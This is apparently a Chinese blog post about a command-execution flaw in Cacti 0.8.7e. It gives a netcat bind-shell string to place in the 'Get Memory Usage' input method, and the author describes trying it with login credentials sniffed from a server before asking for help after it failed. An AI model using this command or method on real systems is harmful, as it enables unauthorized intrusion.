Cacti 远程SHELL测试失败

  • A+
所属分类:WEB安全

Cacti是一款轮循数据库(RRD)工具,可帮助从数据库信息创建图形,有多个Linux版本。

 

 

 

Cacti多个跨站脚本和HTML注入漏洞

受影响系统: 
  Cacti Cacti 0.8.7e

由于配置Cacti的WEB界面的权限设置过于宽松,cacti管理员可以以运行Cacti投票机制用户的权限(通常为非特权用户)在系统上执行任意命令。
例如,可以通过更改Linux - Get Memory Usage的Data Input Method在Cacti系统上生成后门或远程shell。将Input String设置为nohup nc -l -p 6666 -n -e /bin/sh &
就会在调用这个处理器的时候生成远程可访问的shell。

以下是测试截图。

主要信息窗

 

 

设备运行状态窗

 

 

创建用户

 

 修改Linux - Get Memory Usage 框里的指令

 

 

通过服务器嗅探获得了Cacti的登陆用户和口令,对应版本GOOGLE了一下,说是可以通过Get Memory Usage做远程SHELL,兴冲冲就测试了一下,结果失败,希望成功过的大牛们指点一下。在CMD连接SHELL失败。。。

  • 我的微信
  • 这是我的微信扫一扫
  • weinxin
  • 我的微信公众号
  • 我的微信公众号扫一扫
  • weinxin

发表评论

:?: :razz: :sad: :evil: :!: :smile: :oops: :grin: :eek: :shock: :???: :cool: :lol: :mad: :twisted: :roll: :wink: :idea: :arrow: :neutral: :cry: :mrgreen: